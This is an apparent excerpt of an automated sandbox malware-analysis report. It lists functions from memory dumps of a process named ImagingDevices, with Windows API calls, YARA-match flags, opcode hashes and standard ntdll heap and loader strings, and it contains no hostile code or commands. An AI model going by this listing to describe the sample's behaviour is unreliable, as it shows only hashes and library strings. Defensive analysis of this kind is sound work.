                                                                                                  • Opcode ID: 2c56882d6ba8bf578448de90a9cf5da59bfc6358362457d765d989ff5e34f9b3
                                                                                                  • Instruction ID: 4e8b5b9603979593779fe1f7de2829673016f207650668264653408cb2314b32
                                                                                                  • Opcode Fuzzy Hash: 2c56882d6ba8bf578448de90a9cf5da59bfc6358362457d765d989ff5e34f9b3
                                                                                                  • Instruction Fuzzy Hash: 67E0ED762002087BD600EE59DC41F9B33ACEFC4310F004019FA08A3281C672B9108BB8
                                                                                                  Function 0042C893 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 71 42c893-42c8d7 call 4048f3 call 42d7b3 RtlAllocateHeap
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,0041E5E4,?,?,00000000,?,0041E5E4,?,?,?), ref: 0042C8D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 47c6b43b7f29c263505c8cd0a882858649bcc6264c1d12a1f1b9b5e57d3eff1f
                                                                                                  • Instruction ID: e6e8b3794537dfb8c58b3de8acc9f1789de01d5ae22b52d1ee9829aa63cf0a32
                                                                                                  • Opcode Fuzzy Hash: 47c6b43b7f29c263505c8cd0a882858649bcc6264c1d12a1f1b9b5e57d3eff1f
                                                                                                  • Instruction Fuzzy Hash: 76E06DB6244305BBD610EE59DC45FAB33ACEFC4714F004419FA08A7242D675B9108BB4
                                                                                                  Function 0042C933 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 86 42c933-42c96c call 4048f3 call 42d7b3 ExitProcess
                                                                                                  APIs
                                                                                                  • ExitProcess.KERNELBASE(?,00000000,00000000,?,A8229226,?,?,A8229226), ref: 0042C967
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: 83978265a4cde1ac062ccd79c9e728656fa41f54897689da2430693d0be3a923
                                                                                                  • Instruction ID: 136aaa4377b992c0ce37a936d61beba38d9e12674d03e1623fc729aa0e31b1b5
                                                                                                  • Opcode Fuzzy Hash: 83978265a4cde1ac062ccd79c9e728656fa41f54897689da2430693d0be3a923
                                                                                                  • Instruction Fuzzy Hash: C7E0463A200214BBC220BA5AEC41FDBB76CDFC5728F00442AFA08A7281CA75B91586F4

                                                                                                  Non-executed Functions

                                                                                                  Function 008AC5F0 Relevance: 14.2, Strings: 11, Instructions: 424COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 008E53FD
                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 008E5550
                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 008E551A
                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 008E5496
                                                                                                  • @, xrefs: 008C22A5
                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 008E5586
                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 008E545F
                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 008E54E7
                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 008E5566
                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 008E5386
                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 008E5581
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                  • API String ID: 0-4009184096
                                                                                                  • Opcode ID: 92cff56be65991e67d806125378bac87a0c81c62095140d6551b761a85fdfffe
                                                                                                  • Instruction ID: 0557fcbff84863ca55638658c0e9caec8db4dc7d753a1b92f923910cafa145f6
                                                                                                  • Opcode Fuzzy Hash: 92cff56be65991e67d806125378bac87a0c81c62095140d6551b761a85fdfffe
                                                                                                  • Instruction Fuzzy Hash: 31022CF2D006689FDB20DF54CC80A9AB7B8FF55308F4441EAE609E7252E6349E84CF59
                                                                                                  Function 0092FDDD Relevance: 12.0, Strings: 9, Instructions: 799COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                  • API String ID: 0-3591852110
                                                                                                  • Opcode ID: ac3a7aa6b70b8fee8de7ea7b7298d3d9857eae5d4acab7429961b8365e984c20
                                                                                                  • Instruction ID: 69cf628b9964c9cd4b7ec807d0f1a4ace765ce9b0d5cf36d551b169538e460d2
                                                                                                  • Opcode Fuzzy Hash: ac3a7aa6b70b8fee8de7ea7b7298d3d9857eae5d4acab7429961b8365e984c20
                                                                                                  • Instruction Fuzzy Hash: 0D62CC70600656DFCB28CF69C4A4ABAB7F5FF89300F1484A9E9968B652D734ED41CF50
                                                                                                  Function 0093098E Relevance: 11.7, Strings: 9, Instructions: 401COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                                                                                  • API String ID: 0-3316276410
                                                                                                  • Opcode ID: 4dce9cd877750cc6ed177f79604531875d671568b8f0906d02833dcf5ce702f5
                                                                                                  • Instruction ID: 50bc63b67647b88ad19270cf8abd8559221b1f9fcc87bc7d3589a6334411a648
                                                                                                  • Opcode Fuzzy Hash: 4dce9cd877750cc6ed177f79604531875d671568b8f0906d02833dcf5ce702f5
                                                                                                  • Instruction Fuzzy Hash: 7EF1FF71600645EFCB20DF68C490FAAB7F8FF88710F54856AE8959B282C734AD44DFA1
                                                                                                  Function 0092CFB1 Relevance: 11.5, Strings: 9, Instructions: 266COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: None%s$%08I64X: PC32 %08X -> %08X (target %p) %s$%08I64X: Unknown$%08I64X: VA32 %08X -> %08X %s$%08I64X: VA64 %016I64X -> %016I64X %s$ (padding)$(no change)$0(]$Invalid fixup information
                                                                                                  • API String ID: 0-825311913
                                                                                                  • Opcode ID: b07b29aaa69b69adcb814659d9ea9292df2c57f097985dbf60942ddd281c6a71
                                                                                                  • Instruction ID: 405f0375303ecc0b69074874ca73ca6b049a78e82e411949c7f4625cc2a83ff8
                                                                                                  • Opcode Fuzzy Hash: b07b29aaa69b69adcb814659d9ea9292df2c57f097985dbf60942ddd281c6a71
                                                                                                  • Instruction Fuzzy Hash: 4191F7B1E015259FEB18DF88CC81A6973AAFF84310F15C16EE929EB385D674DD41C790
                                                                                                  Function 0089E6C1 Relevance: 10.6, Strings: 8, Instructions: 626COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0(]$8(]$DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$MZER$Status: 0x%08lx$d:\w7rtm\minkernel\ntdll\ldrfind.c$,]
                                                                                                  • API String ID: 0-22464778
                                                                                                  • Opcode ID: a40e023b9a876d00383388a9f784c6cacbc79bca22bfb81ec87034f60d02eb2a
                                                                                                  • Instruction ID: 41ef91d91aa11c09a753c1bd009ec61bba1ed96e0e78d0c0cbae548548cd5a7b
                                                                                                  • Opcode Fuzzy Hash: a40e023b9a876d00383388a9f784c6cacbc79bca22bfb81ec87034f60d02eb2a
                                                                                                  • Instruction Fuzzy Hash: 9F327971900208AFDF21EFA8C884BEEBBB5FF49304F18442AFA55E7261D7749941DB51
                                                                                                  Function 00931238 Relevance: 10.3, Strings: 8, Instructions: 324COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                                                                                  • API String ID: 0-3744532478
                                                                                                  • Opcode ID: 5c7741a190d8ef46cef92b93602d5bdc81470e96568954ef38ef1db1df98e65f
                                                                                                  • Instruction ID: d53724d55b0a59dbfa37dbf761f612bb3cfb8a4664f12ff6a99bcfc5866da5b2
                                                                                                  • Opcode Fuzzy Hash: 5c7741a190d8ef46cef92b93602d5bdc81470e96568954ef38ef1db1df98e65f
                                                                                                  • Instruction Fuzzy Hash: 57C100705046819FDB21EF68C846BAAB7F4FF08714F048459F8A5DA6A2C778E840DF62
                                                                                                  Function 0088F3CF Relevance: 9.2, Strings: 7, Instructions: 466COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • sxsisol_SearchActCtxForDllName, xrefs: 008E3BCE
                                                                                                  • @, xrefs: 0088F3FE
                                                                                                  • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 008E3BDF
                                                                                                  • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 008E3D74
                                                                                                  • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 008E3C08
                                                                                                  • Status != STATUS_NOT_FOUND, xrefs: 008E3D6A
                                                                                                  • Internal error check failed, xrefs: 008E3D79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                  • API String ID: 0-4103935307
                                                                                                  • Opcode ID: 93d1d93bcc698b5b4df731841d8d844009d4030ffaee2033509e8033c4c66e4a
                                                                                                  • Instruction ID: c227897da8baba73b54daaf3dd3f7b359a6137d68e71df5510219950de8155bc
                                                                                                  • Opcode Fuzzy Hash: 93d1d93bcc698b5b4df731841d8d844009d4030ffaee2033509e8033c4c66e4a
                                                                                                  • Instruction Fuzzy Hash: CA02CC70A00209DFDB24DFA9C885ABEB7F0FF49704F20842EE996EB651E7749941CB15
                                                                                                  Function 008AEE4C Relevance: 8.1, Strings: 6, Instructions: 601COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-523794902
                                                                                                  • Opcode ID: ad9fb738a04a002c5c6b1b041fbe616a3a1150bc867040ff0a924a623e210bf8
                                                                                                  • Instruction ID: 47b065e910afe6f86ea55739d667a1324be8179f7b3d8cd0260bcce09c5ea6d1
                                                                                                  • Opcode Fuzzy Hash: ad9fb738a04a002c5c6b1b041fbe616a3a1150bc867040ff0a924a623e210bf8
                                                                                                  • Instruction Fuzzy Hash: 5932CD70604689EFDB11DF28C884FAAB7B5FF04314F14815AE895CB281DBB4EA81DB51
                                                                                                  Function 00402890 Relevance: 7.7, Strings: 6, Instructions: 212COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ^$gfff$gfff$gfff$i$E
                                                                                                  • API String ID: 0-3007594933
                                                                                                  • Opcode ID: 73d89495c848bb57925f92efb9e21ad3c059a2d54f6b301740aa840a6761a342
                                                                                                  • Instruction ID: bd27a48a619183b376d8626edc0a837c8ee63dfd0932711ee3c2991c86c97c23
                                                                                                  • Opcode Fuzzy Hash: 73d89495c848bb57925f92efb9e21ad3c059a2d54f6b301740aa840a6761a342
                                                                                                  • Instruction Fuzzy Hash: 4051E4B2B0051547CF2CCE5EDA582AEB7A1EB94315F18813FDD05EB3C0E6799D418AC4
                                                                                                  Function 00897353 Relevance: 5.5, Strings: 4, Instructions: 466COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • HEAP: , xrefs: 008DDAB3, 008DDB9B
                                                                                                  • HEAP[%wZ]: , xrefs: 008DDAA6, 008DDB8E
                                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 008DDABE
                                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 008DDBA6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                  • API String ID: 0-1657114761
                                                                                                  • Opcode ID: a81723cb543861f06870afc4bdd3ba8f0a96a12734d92186929920acac4633bf
                                                                                                  • Instruction ID: b0232066b828f50ee88ee55ac14546a3279b275c6256cf7a278d387153b43038
                                                                                                  • Opcode Fuzzy Hash: a81723cb543861f06870afc4bdd3ba8f0a96a12734d92186929920acac4633bf
                                                                                                  • Instruction Fuzzy Hash: E202A97161860ACFDB18DF58C484BB9B7B1FF54314F2981AAE886CB391D734E981DB90
                                                                                                  Function 0089351F Relevance: 5.1, Strings: 3, Instructions: 1392COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 008EA4AC
                                                                                                  • HEAP: , xrefs: 008EA498
                                                                                                  • HEAP[%wZ]: , xrefs: 008EA48B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                  • API String ID: 0-2419525547
                                                                                                  • Opcode ID: 38818294bbae973a58de991f0c964096f520c9fe04ed03dc606808712abdfb58
                                                                                                  • Instruction ID: d58d957d8b75e70e6a4b7e3d6a6e14504d59dd7803af346e2b0c132c695acdca
                                                                                                  • Opcode Fuzzy Hash: 38818294bbae973a58de991f0c964096f520c9fe04ed03dc606808712abdfb58
                                                                                                  • Instruction Fuzzy Hash: 11C2DBB0600256DFCB18CF19C494ABA7BB2FF95704B2982A9EC96CB355D730ED41DB90
                                                                                                  Function 00893040 Relevance: 4.8, Strings: 3, Instructions: 1098COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 008EACD9
                                                                                                  • HEAP: , xrefs: 008EACC2
                                                                                                  • HEAP[%wZ]: , xrefs: 008EACB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
